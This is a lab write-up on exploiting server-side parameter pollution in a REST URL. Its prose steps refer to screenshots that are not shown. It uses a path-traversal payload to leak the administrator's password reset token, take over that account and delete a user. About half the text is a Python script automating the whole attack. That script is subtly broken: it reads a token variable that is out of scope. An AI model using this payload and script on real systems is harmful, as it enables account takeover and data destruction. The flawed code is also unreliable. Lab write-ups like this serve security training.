5. Exploiting server-side parameter pollution in a REST URL
Open the vulnerable application:
Lets navigate through the web application:
Forgot password:
Lets go to burpsuite:
Send it to the repeater and add # to it:
Lets try path traversal sequence on it:
It says invalid route so maybe this could refer to restful url path parameter pollution.
Lets find out:
I asked chatgpt, what is the name of the documented file for restful api:
Lets try openapi.json first:
Here we go we found the internal api, so username is a parameter, lets find if we can access field like the previous lab:
Here we go like the previous lab there is an email field as a value that we can access it:
And as the forgotPassword.js file in the burpsuite history, we have to find the PasswordResetToken to reset the administrator password:
Lets try get it:
It errors, and says that this version of the api only supports the email value to be parsed:
And as mentioned in a previous photo that the version is 2, lets try changing it to v1:
So we have to path traverse to get to the /internal to set the version to one:
../../v1/users/administrator/field/passwordResetToken%23And here we go, we got the token:
Lets go reset it using the path mentioned in the forgotPassword.js file:
/forgot-password?passwordResetToken=token we foundAnd here we go:
After changing the password:
Lets navigate to the admin panel to delete the carols user to solve this lab:
And yup finally we solved the lab:
Solve it using a python3 script:
import requests
import re
import os
import sys
import json
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080"
}
session = requests.session()
def Login(username, password):
print("[*] Get CSRF Token.")
csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)
print("[*] Logging In.")
data = f"csrf={csrf[0]}&username={username}&password={password}"
session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)
def GetToken():
print("[*] Get Administrator Token.")
csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "forgot-password", proxies=proxies, verify=False).text)
data1 = f"csrf={csrf[0]}&username=administrator"
session.post(url=url + "forgot-password", data=data1, proxies=proxies, verify=False)
data2 = f"csrf={csrf[0]}&username=../../v1/users/administrator/field/passwordResetToken%23"
result = json.loads(session.post(url=url + "forgot-password", data=data2, proxies=proxies, verify=False).text)
token = result["result"]
def ChangePass():
print("[*] Change Administrator Password.")
csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + f"forgot-password?passwordResetToken={token}", proxies=proxies, verify=False).text)
data = f"csrf={csrf[0]}&passwordResetToken={token}&new-password-1=Caesar3&new-password-2=Caesar3"
session.post(url=url + f"forgot-password?passwordResetToken={token}", data=data, allow_redirects=True, proxies=proxies, verify=False)
ChangePass()
def DeleteCarlos():
print("[*] Login As Administrator.")
csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)
data = f"csrf={csrf[0]}&username=administrator&password=Caesar3"
session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)
print("[*] Delete The User Carlos.")
session.post(url=url + "admin/delete?username=carlos", allow_redirects=True, proxies=proxies, verify=False)
if __name__ == "__main__":
if len(sys.argv) != 2:
script_name = os.path.basename(__file__)
print(f"[-] Usage: python {script_name} http://localhost/")
sys.exit(1)
url = sys.argv[1]
Login("wiener", "peter")
GetToken()
DeleteCarlos()
print("[+] Solved.")Last updated